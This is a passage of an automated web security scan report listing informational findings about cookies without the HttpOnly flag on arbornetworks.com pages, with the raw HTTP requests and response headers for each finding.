<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.351. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/white-papers-global-network-security-topics-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8cfe5f284b42828164be1b411a87779b; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:04 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:04 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:05 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:50:06 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.352. http://www.arbornetworks.com/es/5.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/5.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d3de7b7312ba993afa82456e79e09788; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:55:27 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:27 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.353. http://www.arbornetworks.com/es/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=03fe76825e6a55a9875b9a268728ff32; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:55:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:47 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.354. http://www.arbornetworks.com/fr/4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/4.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=5cdec8e4d3efec138851ea039378ef98; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:55:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:55:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.355. http://www.arbornetworks.com/fr/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ce7f57000930b3ad5447edc90f42023e; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:26 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:55:27 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:51 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.356. http://www.arbornetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.php?lang=en HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e393324131872a0a340d3674de17ba3d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:24 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:25 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:25 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.357. http://www.arbornetworks.com/it  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:59:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=55e6ce65cdc308d83db1a56f181306d1; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:59:49 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:59:49 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Thu, 03-Feb-2011 23:59:50 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:59:51 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.358. http://www.arbornetworks.com/it/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /it/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:55:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=7d71cb4f1d4a37470457699e23da18dd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:55:46 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:55:46 GMT; path=/
Set-Cookie: mbfcookie[lang]=it; expires=Thu, 03-Feb-2011 23:55:47 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:55:56 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.359. http://www.arbornetworks.com/jp/2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jp/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:34 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6cef0659327c8c343c70f99e01f17fcf; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:35 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:35 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:56:36 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:56:36 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.360. http://www.arbornetworks.com/jp/infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /jp/infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jp/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:09 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=92b447a47f02ff137bc46d5e100d8322; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:09 GMT; path=/
Set-Cookie: mbfcookie[lang]=jp; expires=Thu, 03-Feb-2011 23:56:10 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:56:23 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.361. http://www.arbornetworks.com/kr/2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kr/2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:58:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=f486ab92f2f6896cb2c71ab3a04f81a2; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:58:54 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:58:54 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Thu, 03-Feb-2011 23:58:55 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:58:57 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...

11.362. http://www.arbornetworks.com/kr/network-infrastructure-security-report.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /kr/network-infrastructure-security-report.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /kr/network-infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:56:36 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=28474c020d295a5738e5dbd192d0ec6c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:56:36 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:56:36 GMT; path=/
Set-Cookie: mbfcookie[lang]=kr; expires=Thu, 03-Feb-2011 23:56:37 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:57:08 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.363. http://www.arbornetworks.com/privacy_policy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /privacy_policy.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /privacy_policy.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=d03675f1bdd2a9f032c75f15aeef59a8; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.364. https://www.arbornetworks.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.arbornetworks.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:02:52 GMT
